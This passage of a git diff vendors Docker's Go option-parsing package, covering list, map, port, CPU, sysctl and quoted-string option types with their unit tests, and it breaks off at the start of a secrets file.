+ "type=tmpfs,target=/target,tmpfs-size=1m,tmpfs-mode=0700", + "type=tmpfs,target=/target,tmpfs-size=1MB,tmpfs-mode=700", + } { + var mount MountOpt + + assert.NilError(t, mount.Set(testcase)) + + mounts := mount.Value() + assert.Equal(t, len(mounts), 1) + assert.DeepEqual(t, mounts[0], mounttypes.Mount{ + Type: mounttypes.TypeTmpfs, + Target: "/target", + TmpfsOptions: &mounttypes.TmpfsOptions{ + SizeBytes: 1024 * 1024, // not 1000 * 1000 + Mode: os.FileMode(0700), + }, + }) + } +} + +func TestMountOptSetTmpfsError(t *testing.T) { + var m MountOpt + assert.Error(t, m.Set("type=tmpfs,target=/foo,tmpfs-size=foo"), "invalid value for tmpfs-size") + assert.Error(t, m.Set("type=tmpfs,target=/foo,tmpfs-mode=foo"), "invalid value for tmpfs-mode") + assert.Error(t, m.Set("type=tmpfs"), "target is required") +} diff --git a/vendor/github.com/docker/docker/opts/opts.go b/vendor/github.com/docker/docker/opts/opts.go new file mode 100644 index 0000000000..ae851537ec --- /dev/null +++ b/vendor/github.com/docker/docker/opts/opts.go @@ -0,0 +1,360 @@ +package opts + +import ( + "fmt" + "math/big" + "net" + "regexp" + "strings" + + "github.com/docker/docker/api/types/filters" +) + +var ( + alphaRegexp = regexp.MustCompile(`[a-zA-Z]`) + domainRegexp = regexp.MustCompile(`^(:?(:?[a-zA-Z0-9]|(:?[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9]))(:?\.(:?[a-zA-Z0-9]|(:?[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])))*)\.?\s*$`) +) + +// ListOpts holds a list of values and a validation function. +type ListOpts struct { + values *[]string + validator ValidatorFctType +} + +// NewListOpts creates a new ListOpts with the specified validator. +func NewListOpts(validator ValidatorFctType) ListOpts { + var values []string + return *NewListOptsRef(&values, validator) +} + +// NewListOptsRef creates a new ListOpts with the specified values and validator. 
+func NewListOptsRef(values *[]string, validator ValidatorFctType) *ListOpts { + return &ListOpts{ + values: values, + validator: validator, + } +} + +func (opts *ListOpts) String() string { + return fmt.Sprintf("%v", []string((*opts.values))) +} + +// Set validates if needed the input value and adds it to the +// internal slice. +func (opts *ListOpts) Set(value string) error { + if opts.validator != nil { + v, err := opts.validator(value) + if err != nil { + return err + } + value = v + } + (*opts.values) = append((*opts.values), value) + return nil +} + +// Delete removes the specified element from the slice. +func (opts *ListOpts) Delete(key string) { + for i, k := range *opts.values { + if k == key { + (*opts.values) = append((*opts.values)[:i], (*opts.values)[i+1:]...) + return + } + } +} + +// GetMap returns the content of values in a map in order to avoid +// duplicates. +func (opts *ListOpts) GetMap() map[string]struct{} { + ret := make(map[string]struct{}) + for _, k := range *opts.values { + ret[k] = struct{}{} + } + return ret +} + +// GetAll returns the values of slice. +func (opts *ListOpts) GetAll() []string { + return (*opts.values) +} + +// GetAllOrEmpty returns the values of the slice +// or an empty slice when there are no values. +func (opts *ListOpts) GetAllOrEmpty() []string { + v := *opts.values + if v == nil { + return make([]string, 0) + } + return v +} + +// Get checks the existence of the specified key. +func (opts *ListOpts) Get(key string) bool { + for _, k := range *opts.values { + if k == key { + return true + } + } + return false +} + +// Len returns the amount of element in the slice. +func (opts *ListOpts) Len() int { + return len((*opts.values)) +} + +// Type returns a string name for this Option type +func (opts *ListOpts) Type() string { + return "list" +} + +// NamedOption is an interface that list and map options +// with names implement. 
+type NamedOption interface { + Name() string +} + +// NamedListOpts is a ListOpts with a configuration name. +// This struct is useful to keep reference to the assigned +// field name in the internal configuration struct. +type NamedListOpts struct { + name string + ListOpts +} + +var _ NamedOption = &NamedListOpts{} + +// NewNamedListOptsRef creates a reference to a new NamedListOpts struct. +func NewNamedListOptsRef(name string, values *[]string, validator ValidatorFctType) *NamedListOpts { + return &NamedListOpts{ + name: name, + ListOpts: *NewListOptsRef(values, validator), + } +} + +// Name returns the name of the NamedListOpts in the configuration. +func (o *NamedListOpts) Name() string { + return o.name +} + +// MapOpts holds a map of values and a validation function. +type MapOpts struct { + values map[string]string + validator ValidatorFctType +} + +// Set validates if needed the input value and add it to the +// internal map, by splitting on '='. +func (opts *MapOpts) Set(value string) error { + if opts.validator != nil { + v, err := opts.validator(value) + if err != nil { + return err + } + value = v + } + vals := strings.SplitN(value, "=", 2) + if len(vals) == 1 { + (opts.values)[vals[0]] = "" + } else { + (opts.values)[vals[0]] = vals[1] + } + return nil +} + +// GetAll returns the values of MapOpts as a map. +func (opts *MapOpts) GetAll() map[string]string { + return opts.values +} + +func (opts *MapOpts) String() string { + return fmt.Sprintf("%v", map[string]string((opts.values))) +} + +// Type returns a string name for this Option type +func (opts *MapOpts) Type() string { + return "map" +} + +// NewMapOpts creates a new MapOpts with the specified map of values and a validator. 
+func NewMapOpts(values map[string]string, validator ValidatorFctType) *MapOpts { + if values == nil { + values = make(map[string]string) + } + return &MapOpts{ + values: values, + validator: validator, + } +} + +// NamedMapOpts is a MapOpts struct with a configuration name. +// This struct is useful to keep reference to the assigned +// field name in the internal configuration struct. +type NamedMapOpts struct { + name string + MapOpts +} + +var _ NamedOption = &NamedMapOpts{} + +// NewNamedMapOpts creates a reference to a new NamedMapOpts struct. +func NewNamedMapOpts(name string, values map[string]string, validator ValidatorFctType) *NamedMapOpts { + return &NamedMapOpts{ + name: name, + MapOpts: *NewMapOpts(values, validator), + } +} + +// Name returns the name of the NamedMapOpts in the configuration. +func (o *NamedMapOpts) Name() string { + return o.name +} + +// ValidatorFctType defines a validator function that returns a validated string and/or an error. +type ValidatorFctType func(val string) (string, error) + +// ValidatorFctListType defines a validator function that returns a validated list of string and/or an error +type ValidatorFctListType func(val string) ([]string, error) + +// ValidateIPAddress validates an Ip address. +func ValidateIPAddress(val string) (string, error) { + var ip = net.ParseIP(strings.TrimSpace(val)) + if ip != nil { + return ip.String(), nil + } + return "", fmt.Errorf("%s is not an ip address", val) +} + +// ValidateDNSSearch validates domain for resolvconf search configuration. +// A zero length domain is represented by a dot (.). +func ValidateDNSSearch(val string) (string, error) { + if val = strings.Trim(val, " "); val == "." 
{ + return val, nil + } + return validateDomain(val) +} + +func validateDomain(val string) (string, error) { + if alphaRegexp.FindString(val) == "" { + return "", fmt.Errorf("%s is not a valid domain", val) + } + ns := domainRegexp.FindSubmatch([]byte(val)) + if len(ns) > 0 && len(ns[1]) < 255 { + return string(ns[1]), nil + } + return "", fmt.Errorf("%s is not a valid domain", val) +} + +// ValidateLabel validates that the specified string is a valid label, and returns it. +// Labels are in the form on key=value. +func ValidateLabel(val string) (string, error) { + if strings.Count(val, "=") < 1 { + return "", fmt.Errorf("bad attribute format: %s", val) + } + return val, nil +} + +// ValidateSysctl validates a sysctl and returns it. +func ValidateSysctl(val string) (string, error) { + validSysctlMap := map[string]bool{ + "kernel.msgmax": true, + "kernel.msgmnb": true, + "kernel.msgmni": true, + "kernel.sem": true, + "kernel.shmall": true, + "kernel.shmmax": true, + "kernel.shmmni": true, + "kernel.shm_rmid_forced": true, + } + validSysctlPrefixes := []string{ + "net.", + "fs.mqueue.", + } + arr := strings.Split(val, "=") + if len(arr) < 2 { + return "", fmt.Errorf("sysctl '%s' is not whitelisted", val) + } + if validSysctlMap[arr[0]] { + return val, nil + } + + for _, vp := range validSysctlPrefixes { + if strings.HasPrefix(arr[0], vp) { + return val, nil + } + } + return "", fmt.Errorf("sysctl '%s' is not whitelisted", val) +} + +// FilterOpt is a flag type for validating filters +type FilterOpt struct { + filter filters.Args +} + +// NewFilterOpt returns a new FilterOpt +func NewFilterOpt() FilterOpt { + return FilterOpt{filter: filters.NewArgs()} +} + +func (o *FilterOpt) String() string { + repr, err := filters.ToParam(o.filter) + if err != nil { + return "invalid filters" + } + return repr +} + +// Set sets the value of the opt by parsing the command line value +func (o *FilterOpt) Set(value string) error { + var err error + o.filter, err = 
filters.ParseFlag(value, o.filter) + return err +} + +// Type returns the option type +func (o *FilterOpt) Type() string { + return "filter" +} + +// Value returns the value of this option +func (o *FilterOpt) Value() filters.Args { + return o.filter +} + +// NanoCPUs is a type for fixed point fractional number. +type NanoCPUs int64 + +// String returns the string format of the number +func (c *NanoCPUs) String() string { + return big.NewRat(c.Value(), 1e9).FloatString(3) +} + +// Set sets the value of the NanoCPU by passing a string +func (c *NanoCPUs) Set(value string) error { + cpus, err := ParseCPUs(value) + *c = NanoCPUs(cpus) + return err +} + +// Type returns the type +func (c *NanoCPUs) Type() string { + return "decimal" +} + +// Value returns the value in int64 +func (c *NanoCPUs) Value() int64 { + return int64(*c) +} + +// ParseCPUs takes a string ratio and returns an integer value of nano cpus +func ParseCPUs(value string) (int64, error) { + cpu, ok := new(big.Rat).SetString(value) + if !ok { + return 0, fmt.Errorf("failed to parse %v as a rational number", value) + } + nano := cpu.Mul(cpu, big.NewRat(1e9, 1)) + if !nano.IsInt() { + return 0, fmt.Errorf("value is too precise") + } + return nano.Num().Int64(), nil +} diff --git a/vendor/github.com/docker/docker/opts/opts_test.go b/vendor/github.com/docker/docker/opts/opts_test.go new file mode 100644 index 0000000000..9f41e47864 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/opts_test.go @@ -0,0 +1,232 @@ +package opts + +import ( + "fmt" + "strings" + "testing" +) + +func TestValidateIPAddress(t *testing.T) { + if ret, err := ValidateIPAddress(`1.2.3.4`); err != nil || ret == "" { + t.Fatalf("ValidateIPAddress(`1.2.3.4`) got %s %s", ret, err) + } + + if ret, err := ValidateIPAddress(`127.0.0.1`); err != nil || ret == "" { + t.Fatalf("ValidateIPAddress(`127.0.0.1`) got %s %s", ret, err) + } + + if ret, err := ValidateIPAddress(`::1`); err != nil || ret == "" { + 
t.Fatalf("ValidateIPAddress(`::1`) got %s %s", ret, err) + } + + if ret, err := ValidateIPAddress(`127`); err == nil || ret != "" { + t.Fatalf("ValidateIPAddress(`127`) got %s %s", ret, err) + } + + if ret, err := ValidateIPAddress(`random invalid string`); err == nil || ret != "" { + t.Fatalf("ValidateIPAddress(`random invalid string`) got %s %s", ret, err) + } + +} + +func TestMapOpts(t *testing.T) { + tmpMap := make(map[string]string) + o := NewMapOpts(tmpMap, logOptsValidator) + o.Set("max-size=1") + if o.String() != "map[max-size:1]" { + t.Errorf("%s != [map[max-size:1]", o.String()) + } + + o.Set("max-file=2") + if len(tmpMap) != 2 { + t.Errorf("map length %d != 2", len(tmpMap)) + } + + if tmpMap["max-file"] != "2" { + t.Errorf("max-file = %s != 2", tmpMap["max-file"]) + } + + if tmpMap["max-size"] != "1" { + t.Errorf("max-size = %s != 1", tmpMap["max-size"]) + } + if o.Set("dummy-val=3") == nil { + t.Errorf("validator is not being called") + } +} + +func TestListOptsWithoutValidator(t *testing.T) { + o := NewListOpts(nil) + o.Set("foo") + if o.String() != "[foo]" { + t.Errorf("%s != [foo]", o.String()) + } + o.Set("bar") + if o.Len() != 2 { + t.Errorf("%d != 2", o.Len()) + } + o.Set("bar") + if o.Len() != 3 { + t.Errorf("%d != 3", o.Len()) + } + if !o.Get("bar") { + t.Error("o.Get(\"bar\") == false") + } + if o.Get("baz") { + t.Error("o.Get(\"baz\") == true") + } + o.Delete("foo") + if o.String() != "[bar bar]" { + t.Errorf("%s != [bar bar]", o.String()) + } + listOpts := o.GetAll() + if len(listOpts) != 2 || listOpts[0] != "bar" || listOpts[1] != "bar" { + t.Errorf("Expected [[bar bar]], got [%v]", listOpts) + } + mapListOpts := o.GetMap() + if len(mapListOpts) != 1 { + t.Errorf("Expected [map[bar:{}]], got [%v]", mapListOpts) + } + +} + +func TestListOptsWithValidator(t *testing.T) { + // Re-using logOptsvalidator (used by MapOpts) + o := NewListOpts(logOptsValidator) + o.Set("foo") + if o.String() != "[]" { + t.Errorf("%s != []", o.String()) + } + 
o.Set("foo=bar") + if o.String() != "[]" { + t.Errorf("%s != []", o.String()) + } + o.Set("max-file=2") + if o.Len() != 1 { + t.Errorf("%d != 1", o.Len()) + } + if !o.Get("max-file=2") { + t.Error("o.Get(\"max-file=2\") == false") + } + if o.Get("baz") { + t.Error("o.Get(\"baz\") == true") + } + o.Delete("max-file=2") + if o.String() != "[]" { + t.Errorf("%s != []", o.String()) + } +} + +func TestValidateDNSSearch(t *testing.T) { + valid := []string{ + `.`, + `a`, + `a.`, + `1.foo`, + `17.foo`, + `foo.bar`, + `foo.bar.baz`, + `foo.bar.`, + `foo.bar.baz`, + `foo1.bar2`, + `foo1.bar2.baz`, + `1foo.2bar.`, + `1foo.2bar.baz`, + `foo-1.bar-2`, + `foo-1.bar-2.baz`, + `foo-1.bar-2.`, + `foo-1.bar-2.baz`, + `1-foo.2-bar`, + `1-foo.2-bar.baz`, + `1-foo.2-bar.`, + `1-foo.2-bar.baz`, + } + + invalid := []string{ + ``, + ` `, + ` `, + `17`, + `17.`, + `.17`, + `17-.`, + `17-.foo`, + `.foo`, + `foo-.bar`, + `-foo.bar`, + `foo.bar-`, + `foo.bar-.baz`, + `foo.-bar`, + `foo.-bar.baz`, + `foo.bar.baz.this.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbe`, + } + + for _, domain := range valid { + if ret, err := ValidateDNSSearch(domain); err != nil || ret == "" { + t.Fatalf("ValidateDNSSearch(`"+domain+"`) got %s %s", ret, err) + } + } + + for _, domain := range invalid { + if ret, err := ValidateDNSSearch(domain); err == nil || ret != "" { + t.Fatalf("ValidateDNSSearch(`"+domain+"`) got %s %s", ret, err) + } + } +} + +func TestValidateLabel(t *testing.T) { + if _, err := ValidateLabel("label"); err == nil || err.Error() != "bad attribute format: label" { + t.Fatalf("Expected an error [bad attribute format: label], go %v", err) + } + if actual, err := ValidateLabel("key1=value1"); err != nil || actual != "key1=value1" { + t.Fatalf("Expected [key1=value1], got [%v,%v]", actual, err) + 
} + // Validate it's working with more than one = + if actual, err := ValidateLabel("key1=value1=value2"); err != nil { + t.Fatalf("Expected [key1=value1=value2], got [%v,%v]", actual, err) + } + // Validate it's working with one more + if actual, err := ValidateLabel("key1=value1=value2=value3"); err != nil { + t.Fatalf("Expected [key1=value1=value2=value2], got [%v,%v]", actual, err) + } +} + +func logOptsValidator(val string) (string, error) { + allowedKeys := map[string]string{"max-size": "1", "max-file": "2"} + vals := strings.Split(val, "=") + if allowedKeys[vals[0]] != "" { + return val, nil + } + return "", fmt.Errorf("invalid key %s", vals[0]) +} + +func TestNamedListOpts(t *testing.T) { + var v []string + o := NewNamedListOptsRef("foo-name", &v, nil) + + o.Set("foo") + if o.String() != "[foo]" { + t.Errorf("%s != [foo]", o.String()) + } + if o.Name() != "foo-name" { + t.Errorf("%s != foo-name", o.Name()) + } + if len(v) != 1 { + t.Errorf("expected foo to be in the values, got %v", v) + } +} + +func TestNamedMapOpts(t *testing.T) { + tmpMap := make(map[string]string) + o := NewNamedMapOpts("max-name", tmpMap, nil) + + o.Set("max-size=1") + if o.String() != "map[max-size:1]" { + t.Errorf("%s != [map[max-size:1]", o.String()) + } + if o.Name() != "max-name" { + t.Errorf("%s != max-name", o.Name()) + } + if _, exist := tmpMap["max-size"]; !exist { + t.Errorf("expected map-size to be in the values, got %v", tmpMap) + } +} diff --git a/vendor/github.com/docker/docker/opts/opts_unix.go b/vendor/github.com/docker/docker/opts/opts_unix.go new file mode 100644 index 0000000000..f1ce844a8f --- /dev/null +++ b/vendor/github.com/docker/docker/opts/opts_unix.go @@ -0,0 +1,6 @@ +// +build !windows + +package opts + +// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. 
docker daemon -H tcp://:8080 +const DefaultHTTPHost = "localhost" diff --git a/vendor/github.com/docker/docker/opts/opts_windows.go b/vendor/github.com/docker/docker/opts/opts_windows.go new file mode 100644 index 0000000000..ebe40c969c --- /dev/null +++ b/vendor/github.com/docker/docker/opts/opts_windows.go @@ -0,0 +1,56 @@ +package opts + +// TODO Windows. Identify bug in GOLang 1.5.1+ and/or Windows Server 2016 TP5. +// @jhowardmsft, @swernli. +// +// On Windows, this mitigates a problem with the default options of running +// a docker client against a local docker daemon on TP5. +// +// What was found that if the default host is "localhost", even if the client +// (and daemon as this is local) is not physically on a network, and the DNS +// cache is flushed (ipconfig /flushdns), then the client will pause for +// exactly one second when connecting to the daemon for calls. For example +// using docker run windowsservercore cmd, the CLI will send a create followed +// by an attach. You see the delay between the attach finishing and the attach +// being seen by the daemon. +// +// Here's some daemon debug logs with additional debug spew put in. The +// AfterWriteJSON log is the very last thing the daemon does as part of the +// create call. The POST /attach is the second CLI call. Notice the second +// time gap. +// +// time="2015-11-06T13:38:37.259627400-08:00" level=debug msg="After createRootfs" +// time="2015-11-06T13:38:37.263626300-08:00" level=debug msg="After setHostConfig" +// time="2015-11-06T13:38:37.267631200-08:00" level=debug msg="before createContainerPl...." +// time="2015-11-06T13:38:37.271629500-08:00" level=debug msg=ToDiskLocking.... +// time="2015-11-06T13:38:37.275643200-08:00" level=debug msg="loggin event...." +// time="2015-11-06T13:38:37.277627600-08:00" level=debug msg="logged event...." 
+// time="2015-11-06T13:38:37.279631800-08:00" level=debug msg="In defer func" +// time="2015-11-06T13:38:37.282628100-08:00" level=debug msg="After daemon.create" +// time="2015-11-06T13:38:37.286651700-08:00" level=debug msg="return 2" +// time="2015-11-06T13:38:37.289629500-08:00" level=debug msg="Returned from daemon.ContainerCreate" +// time="2015-11-06T13:38:37.311629100-08:00" level=debug msg="After WriteJSON" +// ... 1 second gap here.... +// time="2015-11-06T13:38:38.317866200-08:00" level=debug msg="Calling POST /v1.22/containers/984758282b842f779e805664b2c95d563adc9a979c8a3973e68c807843ee4757/attach" +// time="2015-11-06T13:38:38.326882500-08:00" level=info msg="POST /v1.22/containers/984758282b842f779e805664b2c95d563adc9a979c8a3973e68c807843ee4757/attach?stderr=1&stdin=1&stdout=1&stream=1" +// +// We suspect this is either a bug introduced in GOLang 1.5.1, or that a change +// in GOLang 1.5.1 (from 1.4.3) is exposing a bug in Windows. In theory, +// the Windows networking stack is supposed to resolve "localhost" internally, +// without hitting DNS, or even reading the hosts file (which is why localhost +// is commented out in the hosts file on Windows). +// +// We have validated that working around this using the actual IPv4 localhost +// address does not cause the delay. +// +// This does not occur with the docker client built with 1.4.3 on the same +// Windows build, regardless of whether the daemon is built using 1.5.1 +// or 1.4.3. It does not occur on Linux. We also verified we see the same thing +// on a cross-compiled Windows binary (from Linux). +// +// Final note: This is a mitigation, not a 'real' fix. It is still susceptible +// to the delay if a user were to do 'docker run -H=tcp://localhost:2375...' +// explicitly. + +// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. 
docker daemon -H tcp://:8080 +const DefaultHTTPHost = "127.0.0.1" diff --git a/vendor/github.com/docker/docker/opts/port.go b/vendor/github.com/docker/docker/opts/port.go new file mode 100644 index 0000000000..020a5d1e1c --- /dev/null +++ b/vendor/github.com/docker/docker/opts/port.go @@ -0,0 +1,146 @@ +package opts + +import ( + "encoding/csv" + "fmt" + "regexp" + "strconv" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/go-connections/nat" +) + +const ( + portOptTargetPort = "target" + portOptPublishedPort = "published" + portOptProtocol = "protocol" + portOptMode = "mode" +) + +// PortOpt represents a port config in swarm mode. +type PortOpt struct { + ports []swarm.PortConfig +} + +// Set a new port value +func (p *PortOpt) Set(value string) error { + longSyntax, err := regexp.MatchString(`\w+=\w+(,\w+=\w+)*`, value) + if err != nil { + return err + } + if longSyntax { + csvReader := csv.NewReader(strings.NewReader(value)) + fields, err := csvReader.Read() + if err != nil { + return err + } + + pConfig := swarm.PortConfig{} + for _, field := range fields { + parts := strings.SplitN(field, "=", 2) + if len(parts) != 2 { + return fmt.Errorf("invalid field %s", field) + } + + key := strings.ToLower(parts[0]) + value := strings.ToLower(parts[1]) + + switch key { + case portOptProtocol: + if value != string(swarm.PortConfigProtocolTCP) && value != string(swarm.PortConfigProtocolUDP) { + return fmt.Errorf("invalid protocol value %s", value) + } + + pConfig.Protocol = swarm.PortConfigProtocol(value) + case portOptMode: + if value != string(swarm.PortConfigPublishModeIngress) && value != string(swarm.PortConfigPublishModeHost) { + return fmt.Errorf("invalid publish mode value %s", value) + } + + pConfig.PublishMode = swarm.PortConfigPublishMode(value) + case portOptTargetPort: + tPort, err := strconv.ParseUint(value, 10, 16) + if err != nil { + return err + } + + pConfig.TargetPort = uint32(tPort) + case portOptPublishedPort: + pPort, 
err := strconv.ParseUint(value, 10, 16) + if err != nil { + return err + } + + pConfig.PublishedPort = uint32(pPort) + default: + return fmt.Errorf("invalid field key %s", key) + } + } + + if pConfig.TargetPort == 0 { + return fmt.Errorf("missing mandatory field %q", portOptTargetPort) + } + + if pConfig.PublishMode == "" { + pConfig.PublishMode = swarm.PortConfigPublishModeIngress + } + + if pConfig.Protocol == "" { + pConfig.Protocol = swarm.PortConfigProtocolTCP + } + + p.ports = append(p.ports, pConfig) + } else { + // short syntax + portConfigs := []swarm.PortConfig{} + // We can ignore errors because the format was already validated by ValidatePort + ports, portBindings, _ := nat.ParsePortSpecs([]string{value}) + + for port := range ports { + portConfigs = append(portConfigs, ConvertPortToPortConfig(port, portBindings)...) + } + p.ports = append(p.ports, portConfigs...) + } + return nil +} + +// Type returns the type of this option +func (p *PortOpt) Type() string { + return "port" +} + +// String returns a string repr of this option +func (p *PortOpt) String() string { + ports := []string{} + for _, port := range p.ports { + repr := fmt.Sprintf("%v:%v/%s/%s", port.PublishedPort, port.TargetPort, port.Protocol, port.PublishMode) + ports = append(ports, repr) + } + return strings.Join(ports, ", ") +} + +// Value returns the ports +func (p *PortOpt) Value() []swarm.PortConfig { + return p.ports +} + +// ConvertPortToPortConfig converts ports to the swarm type +func ConvertPortToPortConfig( + port nat.Port, + portBindings map[nat.Port][]nat.PortBinding, +) []swarm.PortConfig { + ports := []swarm.PortConfig{} + + for _, binding := range portBindings[port] { + hostPort, _ := strconv.ParseUint(binding.HostPort, 10, 16) + ports = append(ports, swarm.PortConfig{ + //TODO Name: ? 
+ Protocol: swarm.PortConfigProtocol(strings.ToLower(port.Proto())), + TargetPort: uint32(port.Int()), + PublishedPort: uint32(hostPort), + PublishMode: swarm.PortConfigPublishModeIngress, + }) + } + return ports +} diff --git a/vendor/github.com/docker/docker/opts/port_test.go b/vendor/github.com/docker/docker/opts/port_test.go new file mode 100644 index 0000000000..67bcf8f1d9 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/port_test.go @@ -0,0 +1,259 @@ +package opts + +import ( + "testing" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestPortOptValidSimpleSyntax(t *testing.T) { + testCases := []struct { + value string + expected []swarm.PortConfig + }{ + { + value: "80", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "80:8080", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 8080, + PublishedPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "8080:80/tcp", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 80, + PublishedPort: 8080, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "80:8080/udp", + expected: []swarm.PortConfig{ + { + Protocol: "udp", + TargetPort: 8080, + PublishedPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "80-81:8080-8081/tcp", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 8080, + PublishedPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + { + Protocol: "tcp", + TargetPort: 8081, + PublishedPort: 81, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "80-82:8080-8082/udp", + expected: []swarm.PortConfig{ + { + Protocol: "udp", + TargetPort: 8080, + PublishedPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + { + Protocol: "udp", + 
TargetPort: 8081, + PublishedPort: 81, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + { + Protocol: "udp", + TargetPort: 8082, + PublishedPort: 82, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + } + for _, tc := range testCases { + var port PortOpt + assert.NilError(t, port.Set(tc.value)) + assert.Equal(t, len(port.Value()), len(tc.expected)) + for _, expectedPortConfig := range tc.expected { + assertContains(t, port.Value(), expectedPortConfig) + } + } +} + +func TestPortOptValidComplexSyntax(t *testing.T) { + testCases := []struct { + value string + expected []swarm.PortConfig + }{ + { + value: "target=80", + expected: []swarm.PortConfig{ + { + TargetPort: 80, + Protocol: "tcp", + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "target=80,protocol=tcp", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "target=80,published=8080,protocol=tcp", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 80, + PublishedPort: 8080, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "published=80,target=8080,protocol=tcp", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 8080, + PublishedPort: 80, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + }, + }, + { + value: "target=80,published=8080,protocol=tcp,mode=host", + expected: []swarm.PortConfig{ + { + Protocol: "tcp", + TargetPort: 80, + PublishedPort: 8080, + PublishMode: "host", + }, + }, + }, + { + value: "target=80,published=8080,mode=host", + expected: []swarm.PortConfig{ + { + TargetPort: 80, + PublishedPort: 8080, + PublishMode: "host", + Protocol: "tcp", + }, + }, + }, + { + value: "target=80,published=8080,mode=ingress", + expected: []swarm.PortConfig{ + { + TargetPort: 80, + PublishedPort: 8080, + PublishMode: "ingress", + Protocol: "tcp", + }, + }, + }, + } + for _, tc := range 
testCases { + var port PortOpt + assert.NilError(t, port.Set(tc.value)) + assert.Equal(t, len(port.Value()), len(tc.expected)) + for _, expectedPortConfig := range tc.expected { + assertContains(t, port.Value(), expectedPortConfig) + } + } +} + +func TestPortOptInvalidComplexSyntax(t *testing.T) { + testCases := []struct { + value string + expectedError string + }{ + { + value: "invalid,target=80", + expectedError: "invalid field", + }, + { + value: "invalid=field", + expectedError: "invalid field", + }, + { + value: "protocol=invalid", + expectedError: "invalid protocol value", + }, + { + value: "target=invalid", + expectedError: "invalid syntax", + }, + { + value: "published=invalid", + expectedError: "invalid syntax", + }, + { + value: "mode=invalid", + expectedError: "invalid publish mode value", + }, + { + value: "published=8080,protocol=tcp,mode=ingress", + expectedError: "missing mandatory field", + }, + { + value: `target=80,protocol="tcp,mode=ingress"`, + expectedError: "non-quoted-field", + }, + { + value: `target=80,"protocol=tcp,mode=ingress"`, + expectedError: "invalid protocol value", + }, + } + for _, tc := range testCases { + var port PortOpt + assert.Error(t, port.Set(tc.value), tc.expectedError) + } +} + +func assertContains(t *testing.T, portConfigs []swarm.PortConfig, expected swarm.PortConfig) { + var contains = false + for _, portConfig := range portConfigs { + if portConfig == expected { + contains = true + break + } + } + if !contains { + t.Errorf("expected %v to contain %v, did not", portConfigs, expected) + } +} diff --git a/vendor/github.com/docker/docker/opts/quotedstring.go b/vendor/github.com/docker/docker/opts/quotedstring.go new file mode 100644 index 0000000000..fb1e5374bc --- /dev/null +++ b/vendor/github.com/docker/docker/opts/quotedstring.go @@ -0,0 +1,37 @@ +package opts + +// QuotedString is a string that may have extra quotes around the value. The +// quotes are stripped from the value. 
+type QuotedString struct { + value *string +} + +// Set sets a new value +func (s *QuotedString) Set(val string) error { + *s.value = trimQuotes(val) + return nil +} + +// Type returns the type of the value +func (s *QuotedString) Type() string { + return "string" +} + +func (s *QuotedString) String() string { + return string(*s.value) +} + +func trimQuotes(value string) string { + lastIndex := len(value) - 1 + for _, char := range []byte{'\'', '"'} { + if value[0] == char && value[lastIndex] == char { + return value[1:lastIndex] + } + } + return value +} + +// NewQuotedString returns a new quoted string option +func NewQuotedString(value *string) *QuotedString { + return &QuotedString{value: value} +} diff --git a/vendor/github.com/docker/docker/opts/quotedstring_test.go b/vendor/github.com/docker/docker/opts/quotedstring_test.go new file mode 100644 index 0000000000..0ebf04bbe0 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/quotedstring_test.go @@ -0,0 +1,28 @@ +package opts + +import ( + "github.com/docker/docker/pkg/testutil/assert" + "testing" +) + +func TestQuotedStringSetWithQuotes(t *testing.T) { + value := "" + qs := NewQuotedString(&value) + assert.NilError(t, qs.Set("\"something\"")) + assert.Equal(t, qs.String(), "something") + assert.Equal(t, value, "something") +} + +func TestQuotedStringSetWithMismatchedQuotes(t *testing.T) { + value := "" + qs := NewQuotedString(&value) + assert.NilError(t, qs.Set("\"something'")) + assert.Equal(t, qs.String(), "\"something'") +} + +func TestQuotedStringSetWithNoQuotes(t *testing.T) { + value := "" + qs := NewQuotedString(&value) + assert.NilError(t, qs.Set("something")) + assert.Equal(t, qs.String(), "something") +} diff --git a/vendor/github.com/docker/docker/opts/secret.go b/vendor/github.com/docker/docker/opts/secret.go new file mode 100644 index 0000000000..1fefcf8434 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/secret.go @@ -0,0 +1,107 @@ +package opts + +import ( + "encoding/csv" + 
